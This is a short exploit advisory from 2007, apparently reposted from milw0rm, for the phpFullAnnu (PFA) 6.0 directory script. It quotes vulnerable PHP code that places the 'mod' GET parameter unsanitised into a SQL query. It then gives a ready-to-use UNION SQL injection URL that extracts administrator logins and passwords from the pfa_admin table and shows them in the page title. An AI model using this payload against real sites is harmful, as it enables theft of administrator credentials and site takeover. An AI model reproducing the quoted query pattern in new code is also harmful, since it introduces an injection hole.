# Inclusion Hunter Team
# http://www.ihteam.net
# [phpFullAnnu (PFA) 6.0]
# Class: SQL Injection # Found: 22/09/2007 # Remote: Yes # Site: http://pfa.netsliver.com/
# Download: http://pfa.netsliver.com/download/download.php?Fichier=pfa-v6.tgz
Vulnerable code:
$sqltitle = $bdd->readresult($bdd->request('SELECT h_title FROM
'.$tbprefix.'heading WHERE h_mod = \''.$_GET['mod'].'\''));
//in /include/meta.inc.php
<title><?php echo $title_site, ' - ', $sqltitle;...
//So watch Title bar to see the injection
Exploit (!!!WORK ONLY WITH magic_quotes_gpc = Off!!!):
http://www.site.com/[path]/?lang=fr&mod=login' UNION ALL SELECT concat(a_login ,0x3a,a_password) FROM pfa_admin/*
Thanks To:
White_Sheep for his Bugs Hunter;
# milw0rm.com [2007-09-23]